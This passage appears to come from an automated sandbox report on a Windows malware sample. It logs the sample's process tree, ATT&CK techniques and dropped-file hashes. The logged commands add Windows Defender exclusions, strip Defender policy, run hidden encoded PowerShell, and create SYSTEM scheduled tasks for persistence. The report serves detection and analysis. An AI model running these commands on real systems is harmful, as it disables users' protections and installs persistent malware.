      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\RkUDfeHyKRZhrXlO\bSSddLaV\FkdKQnozmIGNpwwi.wsf"
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\RkUDfeHyKRZhrXlO\bSSddLaV\FkdKQnozmIGNpwwi.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:3044
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1128
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2160
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1888
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1604
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:920
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:308
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:552
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:352
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2664
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2472
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2796
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2788
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2292
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1788
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:880
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1700
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1376
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2440
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2396
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2416
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2240
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1644
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1864
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2176
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gqWAaxfyy" /SC once /ST 00:25:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gqWAaxfyy"
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gqWAaxfyy"
    3⤵
    PID:856
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:2600
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2572
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:2876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 00:13:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\nJebZbA.exe\" 0O /UWuLdidax 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:1212
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "akamOyUwOLVWEybrw"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 256
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2080
- C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\nJebZbA.exe
  C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\nJebZbA.exe 0O /UWuLdidax 525403 /S
  2⤵
  - Executes dropped EXE
  PID:924
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bYIjjyXTgczhZAJGMW"
    3⤵
    PID:308
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
    3⤵
    PID:2464
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:2996
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:1308
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3064
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        
        PID:2772
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
      4⤵
      PID:572
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        5⤵
        
        PID:1156
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2008
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        7⤵
        
        PID:1228
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OniiUkVuU\Epeqwe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yDlQlQjTItyRqSH" /V1 /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1492
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "yDlQlQjTItyRqSH2" /F /xml "C:\Program Files (x86)\OniiUkVuU\huNaBpw.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2740
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "yDlQlQjTItyRqSH"
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "yDlQlQjTItyRqSH"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "JTZgHJltaGFKim" /F /xml "C:\Program Files (x86)\NFFblPWVSTUU2\bkgweTD.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3028
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ebqgbGspXpXbN2" /F /xml "C:\ProgramData\RfQdYYQjhFJxkqVB\xqETYtj.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "fKsAjLTIAPWjkpmTj2" /F /xml "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\dZqWSYu.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "etkoUubEiiZzrHIDvkg2" /F /xml "C:\Program Files (x86)\oMPLyiqsgsRtC\xqHhDGG.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1672

C:\Windows\system32\taskeng.exe
taskeng.exe {81B41794-2AC2-48EB-9BD1-FE0741C65B95} S-1-5-21-2660163958-4080398480-1122754539-1000:FCNAHWEI\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2608

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2436

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1648

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\NFFblPWVSTUU2\bkgweTD.xml

Filesize
2KB

MD5
5fd49826bab384f11b1f11b7351e30b4

SHA1
b54a0f522d299c3e1f7ccc2f2e58f9ae681aae81

SHA256
11102da34fc48b70a6f66651e114d12ab72997a3791b919e2d5c03c350540a8f

SHA512
b0c782a8a00f0976da13ab32299a13ff123de3da944f2b2752759b68a79c693400108af0b1c8710c84b6bfd653aa0c7908d05132a132b6a36d60e35548a96891

Download Submit
C:\Program Files (x86)\OniiUkVuU\huNaBpw.xml

Filesize
2KB

MD5
a0eb4bb2d10a987ba4150b13e2ff7251

SHA1
884dc9efc316f0da74732f4fbae3029588bf6672

SHA256
53ddf57047206d2f4a0807c8ca6a58609cdcf2485872e3325abbe7c32d57a933

SHA512
f966f071cc81fef13627cdf087caaba282ef29dddc3308fcc5392502811ded6fd043a8efb72d9c53e5f87bc7a6378d6e823f48b9af6dbaec7728ded1fcd1c53b

Download Submit
C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\dZqWSYu.xml

Filesize
2KB

MD5
4c577f2a5070f9b336dcac441ffea539

SHA1
4b941c0832f8ac3ff36091465dc44c99cbfbdfbb

SHA256
f7ec5456416d36805fcff8ee97c8c818acf008eccdf2b93eda88ba6895084d16

SHA512
ef19333931283733a6518f756767e2f92d065d4c8a0f4ee1c3d7be797831d144830b95cf65bfb44f3c3a7dc4213901cbb97de1d4fa028187f1eda0425afe8139

Download Submit
C:\Program Files (x86)\oMPLyiqsgsRtC\xqHhDGG.xml

Filesize
2KB

MD5
3f00a53ca9b421aca0ed90c3a73a053e

SHA1
675ebb9f82573af71d84c8bb8717867fbbb3f1be

SHA256
c2c523511291c76f350c27b79114eda7181a244ab60f62090c50f05b8ea80d6d

SHA512
1f1a8ac1498db55868a4385613a0b4ce98ee775776a3894222a168cc41423a061b51062053b663396688c05f072bfb931e9cb78492e3747e1bfb3edea1e5080c

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
01f75478182a8929521408196a8da747

SHA1
b41d49ad35f45445a1d7388d8ecbd649f2563e11

SHA256
9c33c4ab0a4676c62418639324116faf023b404b0fbe698f9323de9319d1c94e

SHA512
613f9de38373382792be1eddb5a2e93dbe2206690bf82a3eb92b6c5510e1b17415732f3c1027a791d923f615daaa2bb2c4a7ee4e89d4a3c8de053ca9bc85189a

Download Submit
C:\ProgramData\RfQdYYQjhFJxkqVB\xqETYtj.xml

Filesize
2KB

MD5
0b51127a84e3fb28fccb05e2155411fb

SHA1
3619fe59e43788148180fd56bce02c1a2b968355

SHA256
5f4e02fff39a02a203095e18cab6aff140efe5adb905452e6a73da87de9cd17e

SHA512
76138ca36fc6fb79f87204abb1bd319b507edb6bc94455dbe51a815c3d890c3887f7165a8f252b0975696915f44b9d42724a7ac6fb4415ac4a5f3f3e6e508a51

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\12HZSVISEAVUMCKTBVZ8.temp

Filesize
7KB

MD5
d07d1390036c83a3fb1fba363bbd2dc5

SHA1
6b0424912c2255cd4b8ac470ee76106f92cc771d

SHA256
deaf451ff766aed82e709ca78bdd11246a9d0a1a8f14de0766deac247fe084e6

SHA512
ff927e6fbcd3d4a83920efc34b3886be8d4d892c1118cefc2f80dd7e358e2b569d9ccb0e6edc2a7c7c46680a3b0b3cdd1cedd9d5e229a48f708a9b7995d2e574

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
68d97a032b4ac121307fce10c4e8f009

SHA1
855ffdc8c6cda2b24f22903e08b30516dc3273d9

SHA256
57120797dcc769efeb9ee7acd528b09f0a0f196be400b232d7e6b1d12039ab32

SHA512
00d03e625dda12f011ed31cf0664a1f4851ba767cac2dd075cab81ac45e5721c77fc16b6bf7b468fbfa93a87aba550f545ce6f7f8d810236bf28a4d00be78579

Download Submit
C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\nJebZbA.exe

Filesize
6.1MB

MD5
39129ea9f57abc7a75ff9e5d9dba4509

SHA1
77b4ad143e35fcba90f56f942ead788706ac5527

SHA256
e3f9dd28ac311925f7e88142ffd29782fd46cb4a0b2b2f59dc174d1f6235ab78

SHA512
31b357acc81f32437a7d2ac44f270260d86788b282b08d2869a177e00b05205b70ca58e4e867c8fec5ba71bb6304577cba8516f7bd8a367976d8bb4576221457

Download Submit
C:\Windows\Temp\RkUDfeHyKRZhrXlO\bSSddLaV\FkdKQnozmIGNpwwi.wsf

Filesize
9KB

MD5
ec8b1fee54049b06d3b2f24f673f68d7

SHA1
a867532a21f00c245757e8a964a4859a004a9957

SHA256
b63754e81226405e4813bcac97762b459169e20bd6ffa086af7877e61603438e

SHA512
9d2db7449805850c5d6350b3304a7ca2896c8146d0f6b0568c511c3694d8111e8c41472b5600d00e41cedc3b1940792d4b22452481c831acc9723a9a9059dbaf

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol

Filesize
5KB

MD5
fe6a7fa86ce140d679b064af06b23da0

SHA1
